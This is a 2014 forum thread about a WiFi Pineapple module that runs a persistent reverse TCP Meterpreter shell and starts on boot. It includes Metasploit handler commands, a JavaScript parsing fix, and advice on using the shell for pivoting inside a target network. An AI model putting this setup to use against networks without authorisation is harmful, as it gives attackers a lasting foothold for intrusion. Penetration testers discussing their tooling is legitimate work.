Darren Kitchen Posted June 25, 2014

New infusion! Meterpreter. Persistent reverse TCP for all your shell and pivoting needs. Enjoy!

Meterpreter Infusion version 1.0

Host - IP or hostname of the target meterpreter listener
Port - Port number of the target meterpreter listener
Update Meterpreter Configuration - saves the Host and Port settings in the /etc/config/meterpreter configuration file.
Meterpreter Start - Starts a persistent meterpreter with the configured settings. If the connection fails, a retry attempt will be made immediately.
Meterpreter Stop - Kills meterpreter and prevents further instances from automatically attempting connection.
Autostart Enable - Enables meterpreter on boot by adding the 'pineapple infusion meterpreter&' command to /etc/rc.local
Autostart Disable - Disables meterpreter on boot by removing the 'pineapple infusion meterpreter&' command from /etc/rc.local

Tips: While general Metasploit help is outside the scope of this infusion, the following commands will typically work:

    use exploit/multi/handler                  # Handles multiple meterpreter sessions
    set PAYLOAD php/meterpreter/reverse_tcp    # Setting for Reverse TCP Meterpreter
    set LHOST [host or ip]                     # Hostname or IP of listener
    set LPORT [port number]                    # Port of listener
    set ExitOnSession false                    # Let the exploit continue when meterpreter exits
    exploit -j                                 # Make the exploit a backgroundable job
    sessions                                   # Lists sessions
    sessions -i [number]                       # Interacts with session number

         ,__,
         (oo)____
         (__)    )\
            ||--|| *

Like Metasploit? Perhaps you'd enjoy Metasploit Minute with Mubix! http://www.metasploitminute.com </shameless plug>
raz0r Posted June 25, 2014

Nice man :) I press the download, nothing happens :(

Regards
Raz0r

Edited June 25, 2014 by raz0r
Sebkinne Posted June 25, 2014

Quoting raz0r: "Nice man :) I press the download, nothing happens :( Regards Raz0r"

Works fine here!
fringes Posted June 25, 2014

Quoting raz0r: "I press the download, nothing happens :("

Same here. It's at the bottom of the list and when I click it... nothing, no pop-up. If it helps, this is the install link and the relevant JavaScript function:

http://172.16.1.10:1471/#sys/bar/preinstall/{%22id%22:%2291%22,%22name%22:%22meterpreter%22,%22version%22:%221.0%22,%22description%22:%22GUI+for+Meterpreter+reverse+TCP.+Accepts+lhost%2Flport.+Supports+start%2Fstop%2C+autostart+enable%2Fdisable.+Provides+a+persistent+remote+shell%2C+pivoting.%22,%22author%22:%22hak5darren%22,%22md5%22:%22c6c662c8ea36c4fb39bab00d2eb78c79%22,%22size%22:%224%22,%22type%22:%22inf%22,%22num_downloads%22:%223%22}/popup

or

http://172.16.1.10:1471/#sys/bar/preinstall/{"id":"91","name":"meterpreter","version":"1.0","description":"GUI for Meterpreter reverse TCP. Accepts lhost/lport. Supports start/stop, autostart enable/disable. Provides a persistent remote shell, pivoting.","author":"hak5darren","md5":"c6c662c8ea36c4fb39bab00d2eb78c79","size":"4","type":"inf","num_downloads":"3"}/popup

    function handle_hash_change(hashValue){
        //[0]:type - [1]:infusion_name - [2]:action - [3]:data - [4]:callback_function
        var hash_array = hashValue.replace(/#/g, '').split('/');
        if(hash_array.length == 5){
            //Correct size, carry on
            $.ajaxSetup({async:false});
            if(hash_array[0] == "usr"){
                $.get('/components/infusions/'+hash_array[1]+'/functions.php?'+hash_array[2]+'='+hash_array[3], function(data){
                    try{
                        window[hash_array[4]](data);
                    }catch(err){
                        console.log("Function not found");
                    }
                });
            }else if(hash_array[0] == "sys"){
                $.get('/components/system/'+hash_array[1]+'/functions.php?'+hash_array[2]+'='+hash_array[3], function(data){
                    try{
                        window[hash_array[4]](data);
                    }catch(err){
                        console.log("Function not found");
                    }
                });
            }
            $.ajaxSetup({async:true});
        }
        //reset url so that we can call the same link again.
        window.location='#';
    }

What appears to be happening is that "var hash_array = hashValue.replace(/#/g, '').split('/');" is resulting in an array of length 8 (instead of 5). It's splitting on the "/" characters in the description.

Edited June 25, 2014 by fringes
Sebkinne Posted June 25, 2014

Quoting fringes: "Same here. It's at the bottom of the list and when I click it... nothing, no pop-up. <snip> What appears to be happening is that "var hash_array = hashValue.replace(/#/g, '').split('/');" is resulting in an array of length 8 (instead of 5). It's splitting on the "/" characters in the description."

As you can see, the first link you have posted is urlencoded. The second link you posted was the decoded version. Thing is, you did the decoding yourself - the WiFi Pineapple doesn't do that (as you can see, no url decoding is done in the handle_hash_change function). It also shouldn't be the '/' character, as the datalocker infusion works and also has a '/' in the description.

I know that on firmware 1.4.1 the download works - I just downloaded and installed the infusion once again.

Best Regards,
Sebkinne
brainstorm44 Posted June 25, 2014

I have firmware 1.4.1 and it doesn't work. All other infusions are working, but on the meterpreter one nothing happens if I press install.
Sebkinne Posted June 25, 2014

Aaaaaaaaaaand we got to the bottom of the issue. Firefox automatically decodes window.location.hash, therefore this fails. For now, I will remove the '/' characters from the description, but we will be shipping a firmware upgrade asap.

Best Regards,
Sebkinne
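An added example (not the WiFi Pineapple's own code, and not posted by anyone in this thread) that shows the failure fringes measured and one way the fragment parser could be made immune to it: the first three and the last segment of "#type/infusion/action/data/callback" are fixed-position fields, so the data segment can be recovered as everything in between, whether or not the browser has already decoded window.location.hash. The sample hash is built from the decoded install link quoted above; the segment validation at the end is my own hardening suggestion, not something the thread describes.

```javascript
// Constructed from the decoded install link quoted in the thread.
var DECODED_HASH = '#sys/bar/preinstall/{"id":"91","name":"meterpreter",' +
  '"version":"1.0","description":"GUI for Meterpreter reverse TCP. ' +
  'Accepts lhost/lport. Supports start/stop, autostart enable/disable. ' +
  'Provides a persistent remote shell, pivoting.","author":"hak5darren",' +
  '"md5":"c6c662c8ea36c4fb39bab00d2eb78c79","size":"4","type":"inf",' +
  '"num_downloads":"3"}/popup';

// What handle_hash_change() does: on a browser-decoded hash the JSON
// description contributes three extra '/' and the field count is no longer 5.
function naiveFieldCount(hashValue) {
  return hashValue.replace(/#/g, '').split('/').length;
}

// Robust version: type, infusion and action are the first three segments and
// the callback is the last one, so the data segment is whatever lies between,
// rejoined with the '/' characters the split removed.
function parseHash(hashValue) {
  var parts = hashValue.replace(/^#/, '').split('/');
  if (parts.length < 5) return null;
  var field = {
    type: parts[0],
    infusion: parts[1],
    action: parts[2],
    data: parts.slice(3, -1).join('/'),
    callback: parts[parts.length - 1]
  };
  // Accept both the still-encoded form (Chrome) and the decoded form (Firefox).
  try { field.data = decodeURIComponent(field.data); } catch (e) { /* already decoded */ }
  // Hardening (my addition): these segments come straight from the URL fragment
  // and the original code concatenates them into a request path and uses the
  // last one as a window[] lookup, so accept only the two known component
  // types, plain path segments and a plain identifier for the callback.
  if (field.type !== 'usr' && field.type !== 'sys') return null;
  if (!/^[\w-]+$/.test(field.infusion) || !/^[\w-]+$/.test(field.action)) return null;
  if (!/^[A-Za-z_$][\w$]*$/.test(field.callback)) return null;
  return field;
}
```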
raz0r Posted June 25, 2014

All working now, thanks chaps :)
Raz0r
fringes Posted June 25, 2014

Quoting Sebkinne: "Firefox automatically decodes window.location.hash, therefore this fails."

Yes, Firefox does that. What browser do you normally recommend for the pineapple?

Quoting Sebkinne: "For now, I will remove the '/' characters from the description, but we will be shipping a firmware upgrade asap."

Do you really think a firmware upgrade is necessary for this, or are there other fixes you're going to incorporate? It seems to me that removing the "/" characters from all the infusion descriptions should be good enough until the next release. (I see you've already done this! Get some sleep Seb.)

Thanks for getting to this so quickly. I would have opened an issue, but I was already running late for work.

PS: I just installed the Meterpreter infusion; good job.
brainstorm44 Posted June 27, 2014

Hi. I really like Metasploit, but I can't figure out what exactly the meterpreter infusion will do. I have Kali Linux on a laptop with IP 192.168.0.100 and port 4444 listening with the PHP reverse TCP payload. When I start the meterpreter infusion on the MKV with 192.168.0.100 port 4444 there is a short message with the sending stage and that's all. I don't know how to use this. Where is the PHP payload and what should I do? I looked in the www folder on the MKV but there is nothing. Thanks for helping!!
fringes Posted June 28, 2014

I'm not really sure what your issues are, so I'll try to give you some general help. I assume you opened the infusion, clicked "Help" and followed the instructions. You should have seen Metasploit sending the stage to your pineapple's IP and then opening a Meterpreter session. If so, you've pwned your pineapple. (If Kali is running in a VM, make sure it's using bridged network mode; the pineapple must be able to connect to it.)

The meterpreter.php payload was installed with the infusion and can be found in the same directory tree, but that isn't relevant. You just need to start the correct handler (listener) in Metasploit (e.g. msfconsole) in Kali, point the infusion at it and click "Start."

As far as what it "will do"... Conceptually, your pineapple might be physically placed on a target network behind a firewall. So having Meterpreter running on the pineapple gives you a foothold inside that network for scanning and "pivoting" to pursue other hosts via Metasploit.
m40295 Posted July 19, 2014

Love it, great job
m40295 Posted August 20, 2014

I have been searching; I have an idea to add to this infusion using the MSF RPC API. Technically you could set up a remote MSF infusion to connect to MSF through the pineapple and control it from a web shell/interface. The thought was: connect to MSF, dropdown, IP box 172.16.42.42, user, pass. What do you think?
phpsystems Posted August 27, 2014

On the current firmware (2.0.3), I get an issue with the infusion. When running the steps in the executable by hand I get:

    X-Powered-By: PHP/5.4.5
    Set-Cookie: PHPSESSID=a4f0e2c39e31a5528c27cee25cf91b6a; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-type: text/html

    <html>
    <head>
    <title>WiFi Pineapple - Login</title>
    <meta http-equiv="cache-control" content="max-age=0" />
    <meta http-equiv="cache-control" content="no-cache" />
    <meta http-equiv="expires" content="0" />
    <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
    <meta http-equiv="pragma" content="no-cache" />
    <link rel="stylesheet" type="text/css" href="includes/css/styles.php" />
    <script src="includes/js/jquery.min.js"></script>
    <noscript><meta http-equiv="refresh" content="0;url=index.php?noJS" /></noscript>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    </head>
    <body style="background-color:black; color: white;">
    <center>
    <div style="background-color: black; position: absolute; margin: auto; top: 50%; left: 50%; width: 256px; height: 356; ; margin-top: -178px;">
    <img src="/includes/img/mk5_logo.gif"><br /><br />
    <form action="" method="POST">
    <table>
    <tr><td>Username:</td><td><input type="text" name="username" value="root"></td></tr>
    <tr><td>Password:</td><td><input type="password" name="password"></td></tr>
    </table>
    <input type="submit" name="login" value="Log In">
    </form>
    </div>
    </center>
    </body>
    </html>

Modifying the executable from:

    php-cgi $DIR/meterpreter.php $IP $PORT > /dev/null

to:

    cd $DIR > /dev/null
    php-cgi ./meterpreter.php $IP $PORT > /dev/null

seems to solve the issue.
d0n350n Posted September 24, 2014

Quoting Sebkinne: "Works fine here!"

I have a question... Does your Kali system have to be connected to the pineapple? Reason I ask is because, correct me if I'm wrong, but the pineapple is on the 172. network, so how would the RHOST be anything different than the 172 network? In the example above, the Kali machine is on a 10. network. Does the pineapple send the shell or receive the shell?
3mrgnc3 Posted September 30, 2014

Quoting d0n350n: "I have a question... Does your Kali system have to be connected to the pineapple? Reason I ask is because, correct me if I'm wrong, but the pineapple is on the 172. network, so how would the RHOST be anything different than the 172 network? In the example above, the Kali machine is on a 10. network. Does the pineapple send the shell or receive the shell?"

Hi d0n350n,

The pineapple has multiple IP interfaces, and can be used in a variety of different configurations. Try reading through this excellent set of guides from Scott Helme's page: https://scotthelme.co.uk/wifi-pineapple-mark-v-introduction-setup/

Also, I've found the info on Cisco's site helpful in the past: http://www.cisco.com/en/US/docs/security/vpn5000/manager/reference/guide/appA.html

It should help you understand the main points.

Cheers.

Edited September 30, 2014 by 3mrgnc3
d0n350n Posted September 30, 2014

Quoting 3mrgnc3: "Hi d0n350n, The pineapple has multiple IP interfaces, and can be used in a variety of different configurations. Try reading through this excellent set of guides from Scott Helme's page: https://scotthelme.co.uk/wifi-pineapple-mark-v-introduction-setup/ Also, I've found the info on Cisco's site helpful in the past. http://www.cisco.com/en/US/docs/security/vpn5000/manager/reference/guide/appA.html It should help you understand the main points. Cheers."

Thanks Bro!! I figured it out, sorta, lol, but let me ask you this: I can get a meterpreter session, but none of the commands work, not even help or shell?
3mrgnc3 Posted November 29, 2014

************** SOLVED ***************
I'm such a massive tool and feel I need to apologise to the community for failing to RTFM!!!
phpsystems +1
You had the answer right there a few lines above....
All the best
3mrgnc3
************** SOLVED ***************

I can't for the life of me seem to get this working... Can someone help me here?

So, in just over a week we have a big demo and equipment test week at work. I'm trying to convince my boss to get us a load of new kit (including a box full of pineapples!) The Meterpreter infusion is pretty central to my argument for us using the Pineapple.

Here are my settings...

I initially set up openssl and installed my own certificates for secure https web access using Firefox. I've also reverted the nginx config back to default and tried it out using plain old http on Firefox, Iceweasel, IE 11, and the latest Chrome...

P.S. The Pineapple has been renamed to "RBx" in line with the project I'm using it for, just in case people start to wonder.

Any tips?

Cheers.
3mrgnc3

Edited November 29, 2014 by 3mrgnc3